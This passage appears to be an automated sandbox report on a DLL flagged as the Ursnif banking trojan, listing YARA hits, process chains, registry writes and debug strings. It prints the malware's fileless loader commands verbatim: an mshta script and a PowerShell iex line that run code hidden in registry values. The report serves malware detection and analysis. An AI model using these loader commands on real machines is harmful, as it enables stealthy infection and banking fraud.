              Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

              E-Banking Fraud:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

              System Summary:

              barindex
              Writes registry values via WMIShow sources
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E141B9C GetProcAddress,NtCreateSection,memset,3_2_6E141B9C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E141EC7 NtMapViewOfSection,3_2_6E141EC7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E142485 NtQueryVirtualMemory,3_2_6E142485
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E167CA02_2_6E167CA0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E16B8402_2_6E16B840
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E1796BD2_2_6E1796BD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E17CEC02_2_6E17CEC0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E17FF3F2_2_6E17FF3F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E175FDD2_2_6E175FDD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E186CF92_2_6E186CF9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E189B9C2_2_6E189B9C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1422643_2_6E142264
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E16B8403_2_6E16B840
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1796BD3_2_6E1796BD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E17CEC03_2_6E17CEC0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E17FF3F3_2_6E17FF3F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E175FDD3_2_6E175FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FFAEEA1056F42_2_00007FFAEEA1056F
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E174A80 appears 67 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E17B4B4 appears 34 times
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: lj3H69Z3Io.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: classification engineClassification label: mal96.troj.evad.winDLL@26/21@3/1
              Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A24.tmpJump to behavior
              Source: lj3H69Z3Io.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
              Source: lj3H69Z3Io.dllVirustotal: Detection: 41%
              Source: lj3H69Z3Io.dllReversingLabs: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,BusysectionJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,DealthisJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,SingJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,TeethshouldJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2Jump to behavior
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
              Source: lj3H69Z3Io.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: lj3H69Z3Io.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
              Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
              Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
              Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Suspicious powershell command line foundShow sources
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E141F7C LoadLibraryA,GetProcAddress,3_2_6E141F7C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E17446D push ecx; ret 2_2_6E174480
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E142D07 push ebp; ret 2_2_6E142D17
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E174AC6 push ecx; ret 2_2_6E174AD9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E142200 push ecx; ret 3_2_6E142209
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E142253 push ecx; ret 3_2_6E142263
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E17446D push ecx; ret 3_2_6E174480
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E174AC6 push ecx; ret 3_2_6E174AD9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1BF506 push ds; ret 3_2_6E1BF508

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe